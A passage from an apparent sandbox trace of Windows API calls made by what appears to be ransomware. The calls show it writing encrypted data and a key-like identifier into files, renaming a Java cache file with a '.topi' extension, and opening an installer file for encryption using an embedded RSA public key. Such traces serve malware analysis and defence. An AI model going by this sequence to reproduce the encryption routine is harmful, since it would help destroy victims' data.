dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0098.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.391] GetCurrentThreadId () returned 0x8c4 [0098.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0098.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99facd0 [0098.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0098.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0098.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0098.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0098.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.392] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.392] GetCurrentThreadId () returned 0x8c4 [0098.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.392] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0098.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.392] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.393] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.393] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0098.393] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0098.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0098.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.393] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0098.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5168 [0098.394] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0098.394] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5180 [0098.394] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0098.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0098.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0098.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5150 [0098.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0098.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5198 [0098.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0098.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0098.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0098.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0098.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5168 | out: hHeap=0x680000) returned 1 [0098.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5168 [0098.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0098.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0098.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0098.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0098.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0098.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0098.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5168 | out: hHeap=0x680000) returned 1 [0098.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0098.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0098.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0098.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0098.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0098.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0098.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0098.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0098.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5198 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5180 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5150 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5138 | out: hHeap=0x680000) returned 1 [0098.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbec0 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0098.399] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x25800, lpOverlapped=0x0) returned 1 [0098.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0098.400] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x182ac2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.400] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0098.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0098.400] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0098.400] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0098.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0098.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0098.401] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0098.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0098.401] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.401] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0098.401] CloseHandle (hObject=0x6a8) returned 1 [0098.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f0f8 [0098.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0098.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f0f8 | out: hHeap=0x680000) returned 1 [0098.924] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.topi")) returned 1 [0098.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.925] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0098.926] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 1 [0098.926] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.926] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd6) returned 0x766b58 [0098.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.926] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned=".msi" [0098.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0098.927] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=906752) returned 1 [0098.927] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0098.930] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xdd5da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.930] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0098.931] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.932] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x25805, lpOverlapped=0x0) returned 1 [0098.934] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0098.934] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.934] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.934] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0098.935] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0098.935] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.935] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0098.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0098.935] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0098.935] GetLastError () returned 0x0 [0098.935] CryptDestroyHash (hHash=0x31c7580) returned 1 [0098.935] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0098.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.935] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0098.935] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0098.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.935] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0098.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25810) returned 0x9a06a00 [0098.936] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0098.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0098.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0098.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbec0 [0098.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5138 [0098.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbf08 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5150 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5180 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5198 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0098.937] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5180 | out: hHeap=0x680000) returned 1 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5198 | out: hHeap=0x680000) returned 1 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0098.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5198 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5180 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0098.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 